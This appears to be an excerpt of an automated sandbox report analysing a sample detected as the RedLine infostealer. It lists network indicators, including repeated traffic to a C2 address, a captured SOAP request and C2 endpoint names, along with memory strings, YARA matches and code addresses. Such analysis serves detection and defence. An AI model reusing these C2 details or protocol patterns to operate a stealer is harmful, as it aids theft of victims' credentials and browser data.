                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.67
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.67:5
                    Source: PO.exe, 0000000F.00000002.2265027022.0000000003138000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.67:55615
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.67:55615/
                    Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.67:55615t-eq
                    Source: PO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: PO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: PO.exeString found in binary or memory: http://ocsp.comodoca.com0
                    Source: PO.exe, 0000000F.00000002.2265027022.0000000003138000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: PO.exe, 00000007.00000002.2154355610.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2239923951.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000306A000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: PO.exe, 0000000F.00000002.2265027022.0000000003110000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: PO.exe, 0000000F.00000002.2265027022.0000000003110000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: PO.exe, PO.exe, 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: PO.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tmp1165.tmp.22.dr, tmp4DCC.tmp.15.dr, tmpDB20.tmp.22.dr, tmp1176.tmp.22.dr, tmp1196.tmp.22.dr, tmp852B.tmp.15.dr, tmp15B0.tmp.15.dr, tmp4DAC.tmp.15.dr, tmpDACF.tmp.22.dr, tmp11A6.tmp.22.dr, tmp853B.tmp.15.dr, tmp475E.tmp.22.dr, tmp1145.tmp.22.dr, tmpA44D.tmp.15.dr, tmp4D7B.tmp.15.dr, tmpDAEF.tmp.22.dr, tmp4D8B.tmp.15.dr, tmpDB00.tmp.22.dr, tmpBC0D.tmp.15.dr, tmp855C.tmp.15.dr, tmp15A0.tmp.15.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C773EA0_2_00C773EA
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C796600_2_00C79660
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C740490_2_00C74049
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C749DC0_2_00C749DC
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C839840_2_00C83984
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C8F14E0_2_00C8F14E
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C842980_2_00C84298
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C7A23C0_2_00C7A23C
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C84B020_2_00C84B02
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C8ECA00_2_00C8ECA0
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C7445B0_2_00C7445B
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C74DD10_2_00C74DD1
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C715950_2_00C71595
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C846CD0_2_00C846CD
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C83E800_2_00C83E80
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C877E00_2_00C877E0
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C937540_2_00C93754
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_01714CF87_2_01714CF8
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_017150B07_2_017150B0
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_017150A17_2_017150A1
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074D17727_2_074D1772
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074D17807_2_074D1780
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074D95D87_2_074D95D8
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074DBFF87_2_074DBFF8
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074D9E487_2_074D9E48
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074D9E377_2_074D9E37
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074DBBC07_2_074DBBC0
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074DBBB07_2_074DBBB0
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074D9A017_2_074D9A01
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_074D9A107_2_074D9A10
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 7_2_0A7228607_2_0A722860
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_014BE7B015_2_014BE7B0
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_014BDC9015_2_014BDC90
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_06AC963015_2_06AC9630
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_06AC372015_2_06AC3720
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_06AC446815_2_06AC4468
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_06AC121015_2_06AC1210
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_06ACDA3015_2_06ACDA30
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 15_2_06ACD14015_2_06ACD140
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 17_2_01034CF817_2_01034CF8
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 17_2_010350B017_2_010350B0
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 17_2_01032F4017_2_01032F40
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 17_2_010350A117_2_010350A1
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 17_2_08F917C017_2_08F917C0
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_02DDE7B022_2_02DDE7B0
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_02DDDC9022_2_02DDDC90
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_068F963022_2_068F9630
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_068F372022_2_068F3720
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_068F446822_2_068F4468
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_068FD52822_2_068FD528
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_068F121022_2_068F1210
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_068FDA3022_2_068FDA30
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_068FEAC022_2_068FEAC0
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeCode function: 22_2_068FEAD022_2_068FEAD0
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: String function: 00C81BC0 appears 44 times
                    Source: owKQ0b029a.exe, 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWLZu.exe8 vs owKQ0b029a.exe
                    Source: owKQ0b029a.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
